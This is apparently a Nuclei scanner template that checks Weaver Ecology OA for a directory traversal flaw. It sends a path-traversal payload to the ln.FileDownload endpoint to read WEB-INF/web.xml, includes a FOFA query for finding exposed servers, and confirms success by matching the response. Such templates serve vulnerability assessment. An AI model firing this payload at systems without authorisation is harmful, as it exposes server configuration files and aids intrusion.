id: ecology-filedownload-directory-traversal

info:
  name: Ecology Directory Traversal
  author: princechaddha
  severity: medium
  metadata:
    fofa-query: app="泛微-协同办公OA"
  tags: ecology,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<url-pattern>/weaver/"
        part: body
